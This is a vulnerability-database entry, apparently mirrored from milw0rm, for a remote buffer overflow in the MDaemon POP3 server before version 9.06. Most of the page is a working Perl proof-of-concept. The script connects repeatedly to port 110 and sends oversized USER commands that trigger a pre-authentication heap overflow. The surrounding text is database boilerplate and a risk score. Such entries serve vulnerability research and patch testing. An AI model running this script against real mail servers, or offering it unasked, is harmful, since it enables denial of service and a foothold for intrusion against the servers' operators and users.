Lucene search
K

MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 9 Views

MDaemon POP3 Server < 9.06 Remote Buffer Overflow Exploit Po

Code

                                                #
# PoC for Mdaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic &#60;[email protected]&#62;
# Infigo IS &#60;http://www.infigo.hr&#62;
# 
#

$host = &#39;192.168.0.105&#39;;

use IO::Socket;

for ($x = 0 ; $x &#60; 12 ; $x++)
{
	$sock = new IO::Socket::INET (PeerAddr =&#62; $host,PeerPort =&#62; &#39;110&#39;, Proto =&#62; &#39;tcp&#39;) 
	|| die &#34;socket error\n\n&#34;;
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock &#34;USER &#34; . &#34;\@A&#34; x 160 . &#34;\r\n&#34;;
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock &#34;QUIT\r\n&#34;;
	recv ($sock, $var, 10000,0);
	print $var;
	close ($sock);
	sleep(1);
}
	$sock = new IO::Socket::INET (PeerAddr =&#62; $host,PeerPort =&#62; &#39;110&#39;, Proto =&#62; &#39;tcp&#39;) 
	|| die &#34;socket error\n\n&#34;;
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock &#34;USER &#34; . &#34;\@A\@A&#34; . &#34;B&#34; x 326 . &#34;\r\n&#34;;
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock &#34;USER &#34; . &#34;\&#39;A&#34; x  337 . &#34;\r\n&#34;;
	recv ($sock, $var, 10000,0);
	print $var;
	sleep(2);

# milw0rm.com [2006-08-22]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
9